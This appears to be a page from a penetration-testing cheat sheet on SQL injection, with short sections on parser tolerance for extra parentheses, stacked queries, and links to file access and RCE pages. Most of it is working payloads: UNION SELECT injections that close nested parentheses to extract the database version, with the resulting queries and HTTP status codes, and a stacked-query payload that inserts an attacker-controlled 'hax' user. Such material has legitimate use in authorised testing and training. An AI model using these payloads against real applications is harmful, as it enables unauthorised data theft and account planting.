Other

SQL Parser Tolerance

SQL parsers in many databases are tolerant of extra parentheses; they are treated as valid syntax even if they don't pair with opening parentheses. For instance, if we are testing an application that we have control of the name parameter and we infer that the query looks something like this:

SELECT id, name, description, price
FROM products
WHERE (name LIKE '%z%' AND active = true)
ORDER BY id ASC;

we can add one or more closing parentheses to account for extra nesting:

// payload
z')union+select+1,version(),3,4--+;

// results in 500
WHERE (name LIKE '%z')union+select+1,version(),3,4--+; AND active = true) ORDER BY id ASC;

// payload
z'))union+select+1,version(),3,4--+;

// results in 200
WHERE (name LIKE '%z'))union+select+1,version(),3,4--+; AND active = true) ORDER BY id ASC;

Stacked Queries

Some RDBMSs can execute more than one query at a time: these queries are submitted simultaneously, but executed sequentially. An RDMS might execute only the first query while another execute only the last.

A common vector of exploiting stacked queries is to add, update, or delete data as these types of queries don't return results if successfully executed.

// payload
10; insert into users(id, username, password) values (1001,'hax','hax');

Reading/Writing Files

For PostgreSQL see here.
For MySQL see here.

RCE

For MSSQL see here.

PreviousSecond Order NextSQLMap

Last updated 1 year ago

hashtagSQL Parser Tolerance

hashtagStacked Queries

hashtagReading/Writing Files

hashtagRCE

SQL Parser Tolerance

Stacked Queries

Reading/Writing Files

RCE